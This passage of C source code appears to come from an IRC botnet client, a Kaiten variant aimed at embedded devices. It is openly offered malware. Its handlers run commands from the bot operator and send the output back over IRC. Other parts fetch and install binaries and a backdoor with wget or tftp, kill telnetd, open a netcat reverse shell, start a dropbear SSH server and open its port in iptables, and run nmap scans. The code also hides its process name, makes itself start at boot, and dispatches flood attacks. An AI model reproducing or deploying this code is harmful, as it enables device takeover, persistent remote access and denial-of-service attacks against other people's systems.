HOME=/tmp;export;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;trap '' 1 2; sh -c '%s'&",message+4);3918command=popen(buf,"r");3919while(!feof(command)) {3920memset(buf,0,1024);3921fgets(buf,1024,command);3922Send(sock, "NOTICE %s :%s\n", sender,buf);3923sleep(1);3924}3925pclose(command);3926exit(0);3927}39283929// GETBB (this installs a better busybox, via tftp. This func, like the rest, has a dependency that we would like eliminate (in this case tftp). We really want to have the c program handle as much of thse custom funcs as possile. I am not graet with c, but proficient with linux, so i added these.3930if(!strncmp(message,"GETBB ",6)) {3931char buf[1024];3932FILE *command;3933if(mfork(sender) != 0) return;3934memset(buf,0,1024);3935sprintf(buf,"export fileGet=busybox-mips;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;cd /var;(([ ! -e /var/\"$fileGet\" ] || [ ! -s /var/\"$fileGet\" ]) && tftp -g -r \"$fileGet\" %s && chmod +x \"$fileGet\" && ./\"$fileGet\" mkdir bin && ./\"$fileGet\" --install -s /var/bin && ls -l \"$fileGet\" || echo It appears we already have /var/\"$fileGet\")",message+6);3936command=popen(buf,"r");3937while(!feof(command)) {3938memset(buf,0,1024);3939fgets(buf,1024,command);3940Send(sock, "NOTICE %s :%s\n", sender,buf);3941sleep(1);3942}3943pclose(command);3944exit(0);3945}394639473948// GETSSH (download, install, start dropbear, requires busybox for wget, mv, somet other things that are not always present on embedded devices3949if(!strncmp(message,"GETSSH ",7)) {3950char buf[1024];3951FILE *command;3952if(mfork(sender) != 0) return;3953memset(buf,0,1024);3954sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;cd /tmp;export url=%s;name=`echo \"$url\" | sed 's#.\x2a/##'` && wget -O \"$name\" \"$url\";chmod +x \"$name\";mv \"$name\" /var/bin;ls -l /var/bin/\"$name\" && dss=/var/dbs/dropbear_dss_host_key;rsa=/var/dbs/dropbear_rsa_host_key;ecd=/var/dbs/dropbear_ecdsa_host_key;cd /var/bin;for i in dropbear dbclient dropbearkey dropbearconvert;do ln -s /var/bin/dropbearmulti $i;done;[ ! -d /var/dbs ] && mkdir /var/dbs;[ -f $dss ] || dropbearkey -t dss -f $dss;[ -f $rsa ] || dropbearkey -t rsa -f $rsa;[ -f $ecd ] || dropbearkey -t ecdsa -f $ecd;dropbear -r $dss -r $rsa -r $ecd -p 30022;iptables -I INPUT 1 -p tcp --dport 30022 -j ACCEPT",message+7);3955command=popen(buf,"r");3956while(!feof(command)) {3957memset(buf,0,1024);3958fgets(buf,1024,command);3959Send(sock, "NOTICE %s :%s\n", sender,buf);3960sleep(1);3961}3962pclose(command);3963exit(0);3964}396539663967// INSTALL (uses wget to download and install a file into our hack path. This program already has a built in http func, so it would be great to use taht instead of needing to download busybox/wget first39683969if(!strncmp(message,"INSTALL ",8)) {3970char buf[1024];3971FILE *command;3972if(mfork(sender) != 0) return;3973memset(buf,0,1024);3974sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.\x2a/##'`;(([ ! -e /var/bin/$name ] || [ ! -s /var/bin/$name ]) && echo \"$name either doesnt exist or eq 0 so we get\" && cd /tmp && wget -O \"$name\" \"$url\" && chmod +x \"$name\" && mv \"$name\" /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"It appears I already have $name\")",message+8);3975command=popen(buf,"r");3976while(!feof(command)) {3977memset(buf,0,1024);3978fgets(buf,1024,command);3979Send(sock, "NOTICE %s :%s\n", sender,buf);3980sleep(1);3981}3982pclose(command);3983exit(0);3984}398539863987// BINUPDATE http://server/file (like install, but updates the program)39883989if(!strncmp(message,"BINUPDATE ",10)) {3990char buf[1024];3991FILE *command;3992if(mfork(sender) != 0) return;3993memset(buf,0,1024);3994sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;export url=%s;export name=`echo \"$url\" | sed 's#.*/##'`;([ -e /var/bin/$name ]) && echo $name exists so we delete it... && rm /var/bin/$name && cd /tmp && wget -O $name $url && chmod +x $name && mv $name /var/bin && ([ -f /var/bin/$name ] && ls -l /var/bin/$name) || echo \"$name doesnt exist, perhaps you mean INSTALL?\"",message+10);3995command=popen(buf,"r");3996while(!feof(command)) {3997memset(buf,0,1024);3998fgets(buf,1024,command);3999Send(sock, "NOTICE %s :%s\n", sender,buf);4000sleep(1);4001}4002pclose(command);4003exit(0);4004}40054006// LOCKUP <http:server/backdoor> (This kills telnet and installs my backdoor binary, which is aes encrypted. This is prob something else that would be cool to have built in to elimiate the dependency40074008if(!strncmp(message,"LOCKUP ",7)) {4009char buf[1024];4010FILE *command;4011if(mfork(sender) != 0) return;4012memset(buf,0,1024);4013sprintf(buf,"export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;export HOME=/tmp;[ ! -f /var/bin/dmips ] && cd /var/bin;wget -O dmips %s;chmod +x /var/bin/dmips;(killall -9 telnetd || kill -9 telnetd) && (nohup dmips || trap '' 1 2 /var/bin/dmips)",message+7);4014command=popen(buf,"r");4015while(!feof(command)) {4016memset(buf,0,1024);4017fgets(buf,1024,command);4018Send(sock, "NOTICE %s :%s\n", sender,buf);4019sleep(1);4020}4021pclose(command);4022exit(0);4023}40244025// !* RSHELL server.com 4444 (reverse shell via nc. We need a built in reverese shell functiomn to eliminiate taht dependency4026if(!strncmp(message,"RSHELL ",6)) {4027char buf[1024];4028FILE *command;4029if(mfork(sender) != 0) return;4030memset(buf,0,1024);4031sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;trap '' 1 2; sh -c 'nohup nc %s -e /bin/sh '&",message+6);4032command=popen(buf,"r");4033while(!feof(command)) {4034memset(buf,0,1024);4035fgets(buf,1024,command);4036Send(sock, "NOTICE %s :%s\n", sender,buf);4037sleep(1);4038}4039pclose(command);4040exit(0);4041}40424043//SCAN (calls a wrapper script. We need a built in port scanner that auto uploads the results to a server4044if(!strncmp(message,"SCAN ",5)) {4045char buf[1024];4046FILE *command;4047if(mfork(sender) != 0) return;4048memset(buf,0,1024);4049sprintf(buf,"export HOME=/tmp;export PATH=/var/bin:/bin:/sbin:/usr/bin:/usr/sbin;(([ ! -x /var/bin/scan ] || [ ! -x /var/bin/nmap ]) && echo \"I am missing either scan or nmap, and Shellzrus was on Xanax when he wrote this, so you need to do INSTALL http:\x2f\\server/nmap and INSTALL http:\x2f\x2fserver/scan first...\" && ([ -f /var/bin/nmap ] && ls -l /var/bin/nmap) && ([ -f /va\x72/bin/scan ] && ls -l /var/bin/scan) || scan %s)",message+5);4050command=popen(buf,"r");4051while(!feof(command)) {4052memset(buf,0,1024);4053fgets(buf,1024,command);4054Send(sock, "NOTICE %s :%s\n", sender,buf);4055sleep(1);4056}4057pclose(command);4058exit(0);4059}40604061// !* BASH echo hello4062if(!strncmp(message,"BASH ",5)) {4063char buf[1024];4064FILE *command;4065if(mfork(sender) != 0) return;4066memset(buf,0,1024);4067sprintf(buf,"export HOME=/tmp;export SHELL=/var/bin/bash;export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/var/bin;%s",message+5);4068command=popen(buf,"r");4069while(!feof(command)) {4070memset(buf,0,1024);4071fgets(buf,1024,command);4072Send(sock, "NOTICE %s :%s\n", sender,buf);4073sleep(1);4074}4075pclose(command);4076exit(0);40774078}4079m=strlen(message);4080for (i=0;i<m;i++) {4081if(*message == ' ' || *message == 0) break;4082name[i]=*message;4083message++;4084}4085for (i=0;i<strlen(message);i++) if(message[i] == ' ') num_params++;4086num_params++;4087if(num_params > 10) num_params=10;4088params[0]=name;4089params[num_params+1]="\0";4090m=1;4091while(*message != 0) {4092message++;4093if(m >= num_params) break;4094for (i=0;i<strlen(message) && message[i] != ' ';i++);4095params[m]=(char*)malloc(i+1);4096strncpy(params[m],message,i);4097params[m][i]=0;4098m++;4099message+=i;4100}4101for (m=0; flooders[m].cmd != (char *)0; m++) {4102if(!strcasecmp(flooders[m].cmd,name)) {4103flooders[m].func(sock, sender,num_params-1,params);4104for (i=1;i<num_params;i++) free(params[i]);4105return;4106}4107}4108}4109}41104111void _376(int sock, char *sender, char *str) {4112Send(sock, "MODE %s -xi\n",nick);4113Send(sock, "JOIN %s :%s\n",chan,key);4114Send(sock, "WHO %s\n",nick);4115if(scanPid == 0) {4116SeigHeil(sock);4117if(scanPid != 0) {4118//Send(sock, "PRIVMSG %s :[TELNET] [+] SCANNER STARTED!\n", chan); //Scanner has been started successfully!!!4119}4120}4121}4122void _PING(int sock, char *sender, char *str) {4123Send(sock, "PONG %s\n",str);4124}4125void _352(int sock, char *sender, char *str) {4126int i,d;4127char *msg=str;4128struct hostent *hostm;4129unsigned long m;4130for (i=0,d=0;d<5;d++) {4131for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;4132if(i == strlen(str)) return;4133}4134for (i=0;i<strlen(msg) && msg[i] != ' ';i++);4135msg[i]=0;4136if(!strcasecmp(msg,nick) && !spoofsm) {4137msg=str;4138for (i=0,d=0;d<3;d++) {4139for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;4140if(i == strlen(str)) return;4141}4142for (i=0;i<strlen(msg) && msg[i] != ' ';i++);4143msg[i]=0;4144if((m = inet_addr(msg)) == -1) {4145if((hostm=gethostbyname(msg)) == NULL) {4146Send(sock, "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);4147return;4148}4149memcpy((char*)&m, hostm->h_addr, hostm->h_length);4150}4151((char*)&spoofs)[3]=((char*)&m)[0];4152((char*)&spoofs)[2]=((char*)&m)[1];4153((char*)&spoofs)[1]=((char*)&m)[2];4154((char*)&spoofs)[0]=0;4155spoofsm=256;4156}4157}4158void _433(int sock, char *sender, char *str) {4159free(nick);4160nick=randstring(realrand(4, 8));4161}4162void _NICK(int sock, char *sender, char *str) {4163int i;4164for (i=0;i<strlen(sender) && sender[i] != '!';i++);4165sender[i]=0;4166if(!strcasecmp(sender,nick)) {4167if(*str == ':') str++;4168if(nick) free(nick);4169nick=randstring(realrand(4, 8));4170}4171}4172struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {4173{ "352", _352 },4174{ "376", _376 },4175{ "433", _433 },4176{ "422", _376 },4177{ "PRIVMSG", _PRIVMSG },4178{ "PING", _PING },4179{ "NICK", _NICK },4180{ (char *)0, (void (*)(int,char *,char *))0 } };41814182void con() {4183int error = 0;4184socklen_t len = sizeof (error);4185int retval = getsockopt (sock, SOL_SOCKET, SO_ERROR, &error, &len);4186if (retval != 0) {4187/* there was a problem getting the error code */4188//fprintf(stderr, "error getting socket error code: %s\n", strerror(retval));4189} else if (error != 0) {4190/* socket has a non zero error status */4191//fprintf(stderr, "socket error: %s\n", strerror(error));4192} else {4193//our sock is ay okay4194return;4195}4196struct sockaddr_in srv;4197unsigned long ipaddr,start;4198int flag;4199struct hostent *hp;4200start:4201sock=-1;4202flag=1;4203if(changeservers == 0) server=servers[rand()%numservers];4204changeservers=0;4205while((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);4206if(inet_addr(server) == 0 || inet_addr(server) == -1) {4207if((hp = gethostbyname(server)) == NULL) {4208server=NULL;4209close(sock);4210goto start;4211}4212bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);4213}4214else srv.sin_addr.s_addr=inet_addr(server);4215srv.sin_family = AF_INET;4216srv.sin_port = htons(6667); //Note to self: change to 4434217ioctl(sock,FIONBIO,&flag);4218start=time(NULL);4219while(time(NULL)-start < 10) {4220errno=0;4221if(connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {4222setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);4223setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);4224setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);4225return;4226}4227if(!(errno == EINPROGRESS ||errno == EALREADY)) break;4228sleep(1);4229}4230server=NULL;4231close(sock);4232goto start;4233}42344235void makeFukdString(char *buf, int length) {4236srand(time(NULL));4237int i = 0;4238for(i = 0; i < length; i++) buf[i] = (rand() % 223) + 33; // No spaces.4239}42404241void touchMyself(char **argv) {4242if(!fork()) {4243while(1) {4244makeFukdString(argv[0], 1024 + (rand() % 128)); // Crashes almost all /proc/pid/cmdline based botkillers. Including Mirai. sweg4245sleep(3); // rape process name every 3 seconds4246}4247}4248return;4249}42504251int main(int argc, char **argv) {4252setsid();4253signal(SIGPIPE, SIG_IGN);4254if(!fork()) { return; }4255touchMyself(&argv); // Mega anti botkill. completely hides process name. nearly like a rootkit but more noisy4256// botkill();4257strcpy(dispass, "FreakIsYourGod!!!");4258int on,i;4259char cwd[256],*str;4260FILE *file;4261#ifdef STARTUP4262str="/etc/rc.d/rc.local";4263file=fopen(str,"r");4264if(file == NULL) {4265str="/etc/rc.conf";4266file=fopen(str,"r");4267}4268if(file != NULL) {4269char outfile[256], buf[1024];4270int i=strlen(argv[0]), d=0;4271getcwd(cwd,256);4272if(strcmp(cwd,"/")) {4273while(argv[0][i] != '/') i--;4274sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);4275while(!feof(file)) {4276fgets(buf,1024,file);4277if(!strcasecmp(buf,outfile)) d++;4278}4279if(d == 0) {4280FILE *out;4281fclose(file);4282out=fopen(str,"a");4283if(out != NULL) {4284fputs(outfile,out);4285fclose(out);4286}4287}4288else fclose(file);4289}4290else fclose(file);4291}4292#endif4293for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));4294srand((time(NULL) ^ getpid()) + getppid());4295nick=randstring(realrand(4, 8));4296ident=randstring(realrand(4, 8));4297user=randstring(realrand(4, 8));4298chan=CHAN;4299key=KEY;4300server=NULL;4301sa:4302#ifdef IDENT4303for (i=0;i<numpids;i++) {4304if(pids[i] != 0 && pids[i] != getpid()) {4305kill(pids[i],9);4306waitpid(pids[i],NULL,WNOHANG);4307}4308}4309pids=NULL;4310numpids=0;4311identd();4312#endif4313con();4314Send(sock, "NICK [%s|%s]%s\nUSER %s localhost localhost :%s\n", PREFIX, getBuild(), nick, user, ident);4315while(1) {4316unsigned long i;4317fd_set n;4318struct timeval tv;4319FD_ZERO(&n);4320FD_SET(sock,&n);4321tv.tv_sec=60*20;4322tv.tv_usec=0;4323if(select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;4324for (i=0;i<numpids;i++) if(waitpid(pids[i],NULL,WNOHANG) > 0) {4325unsigned int *newpids,on;4326for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];4327pids[on-1]=0;4328numpids--;4329newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));4330for (on=0;on<numpids;on++) newpids[on]=pids[on];4331free(pids);4332pids=newpids;4333}4334if(FD_ISSET(sock,&n)) {4335char buf[4096], *str;4336int i;4337if((i=recv(sock,buf,4096,0)) <= 0) goto sa;4338buf[i]=0;4339str=strtok(buf,"\n");4340while(str && *str) {4341char name[1024], sender[1024];4342filter(str);4343if(*str == ':') {4344for (i=0;i<strlen(str) && str[i] != ' ';i++);4345str[i]=0;4346strcpy(sender,str+1);4347strcpy(str,str+i+1);4348}4349else strcpy(sender,"*");4350for (i=0;i<strlen(str) && str[i] != ' ';i++);4351str[i]=0;4352strcpy(name,str);4353strcpy(str,str+i+1);4354for (i=0;msgs[i].cmd != (char *)0;i++) if(!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock, sender, str);4355if(!strcasecmp(name, "ERROR")) {4356if(scanPid != 0) { // Is the scanner running?4357if(kill(scanPid, 9) == 0) { // Kill the knights scanner if we get disconnected4358scanPid = 0;4359}4360}43614362close(sock); //Close old sock4363sleep(5);4364goto sa; // Start connection routine4365}4366str=strtok((char*)NULL,"\n");4367}4368}4369}4370return 0;4371}4372/*4373* Uber kaiten variant coded by Freak a.k.a Milenko4374* Capsaicin IRC botnet (New lightaidra)4375* @Nullzsec on twitter4376* NullzSec ROCKS!!!! :D4377* Kik: rcew4378* XMPP/Jabber: [email protected]4379* Be a homie and gimme sum btc for serv0rs pls4380*4381* Listen: https://play.google.com/music/m/Ttlmdokq4gorrhdvx7k7od5v33e?t=The_Link_-_YTCracker4382*/43834384